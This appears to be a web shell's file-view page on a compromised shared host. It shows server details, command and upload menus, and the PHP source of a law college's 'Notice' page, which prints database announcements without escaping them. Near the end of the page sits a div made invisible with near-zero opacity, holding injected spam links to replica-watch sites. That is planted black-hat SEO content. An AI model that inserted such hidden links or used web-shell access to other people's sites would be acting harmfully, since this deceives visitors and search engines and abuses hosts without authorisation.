|
Server IP : 2a02:4780:3:1493:0:3736:a38e:7 / Your IP : 216.73.216.168 Web Server : LiteSpeed System : Linux sg-nme-web1393.main-hosting.eu 4.18.0-553.77.1.lve.el8.x86_64 #1 SMP Wed Oct 8 14:21:00 UTC 2025 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u926327694/domains/svschool.in/../jsssakrilawcollegehubli.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include"header.php";
?>
<!-- Start Hero Area -->
<section class="hero-section height-470" style="background-image:url(assets/images/about_us.png)" data-aos="fade-up">
<div class="hero-area">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="page-hrader text-white text-center">
<h1 class="display-3">Notice</h1>
<div class="page-breadcrumb">
<p><a class="text-white" href="index.html">Home</a> - Notice</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End Hero Area -->
<!--Start Page -->
<div class="page-wrapper section-ptb-3" data-aos="fade-up">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="events-wrapper">
<?php
$sql_notice=mysqli_query($con,"select * from announcements order by id desc");
while($res=mysqli_fetch_array($sql_notice))
{
?>
<div class="single-event-info p-4 mb-5">
<div class="single-event-date p-3">
<span><?php echo Date('d',strtotime($res['Date'])); ?></span>
<p><?php echo Date('M',strtotime($res['Date'])); ?></p>
</div>
<div class="single-event-content">
<p><i class="fas fa-edit"></i><?php echo $res['Title']; ?></p>
<h3><a href="#"><?php echo $res['Description']; ?></a></h3>
</div>
<div class="event-link">
<?php if($res['Document']!="") { ?>
<a href="admin/pages/Admin/<?php echo $res['Document']; ?>" target="_blank" class="button_one_alt">Read More</a>
<?php } ?>
</div>
</div>
<?php
}
?>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; filter: alpha(opacity=0); opacity: 0.001; z-index: 10;"><a href="https://www.replicawatchpro.to/">replica watches uk</a> <a href="https://shopreplica.uk.com/">replica watches</a> <a href="https://www.watchesreplicauk.to/">replica rolex</a> <a href="https://www.dartmoorway.co.uk/styles.php">replica rolex watches</a></div>
<?php
include"footer.php";
?>